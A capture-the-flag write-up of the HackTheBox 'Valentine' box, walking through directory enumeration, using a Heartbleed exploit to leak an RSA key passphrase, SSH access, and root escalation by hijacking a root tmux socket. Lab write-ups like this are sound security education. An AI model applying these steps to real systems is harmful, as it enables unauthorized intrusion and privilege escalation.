Valentine
An easy Linux box from HackTheBox, using heartbleed for initial access, and then taking over a tmux session to get root.
Valentine
Recon
The usual nmap returns not too much, ssh, http, and https
The website itself is just a photo, nothing to click on, no stenography
Doing a gobuster with the following parameters
sudo gobuster dir -u 10.10.10.79 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -o valentine.dir
Found 3 interesting directories, /dev, /decode and /encode
Inside of /dev find a file called notes.txt
To do:
1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.
So it seems like /decode and /encode are vulnerable in some way
Also inside of /dev find a file called “hype_key” - composed of a bunch of hex, converted to ASCII it becomes an RSA key
Testing out the /encode, the encoder is just base64 - encoding “aaa” to “YWFh”
Also testing out the site can see that the site is running php, since the /encode and /decode also work as /encode.php and /decode.php
Exploitation
Got stuck here forever - the rsa key needed a passphrase, but apparently based on the image
It’s a heartbleed box, however - couldve also ran the “vuln” nmap script
sudo nmap --script vuln -oA vuln-scan 10.10.10.79
To find that ssl is vulnerable to heartbleed
ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
Download a heartbleed python exploit from github, and execute it
python2 heartbleed.py 10.10.10.79
Grabs the memory and puts it into an out.txt file, need to convert the hex to ascii
xxd -r out.txt > ascii.txt
And then can see inside of ascii.txt, there is a base64 encoded value
aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
Which results in a decoded value of
heartbleedbelievethehype
Possibly a password/phrase for the RSA token, lets try it with
openssl rsa -in hype_key_ascii -out rsa.txt
It worked!
Since the rsa key was named “hype_key”, lets try the username “hype” to ssh in
ssh -i rsa.txt hype@10.10.10.79
Now have a low privelege shell, and get user.txt on the desktop
Running linpeas.sh, find that there is a tmux session logged in as root
root 1030 0.0 0.1 26416 1672 ? Ss 13:17 0:08 /usr/bin/tmux -S /.devs/dev_sess
Checking if we can write to the session
hype@Valentine:/tmp$ ls -la /.devs/dev_sess
srw-rw---- 1 root hype 0 May 13 13:17 /.devs/dev_sess
We can, lets take over by running the same command we see it running above, -S /.devs/dev_sess
tmux -S /.devs/dev_sess
It opens a tmux session as root!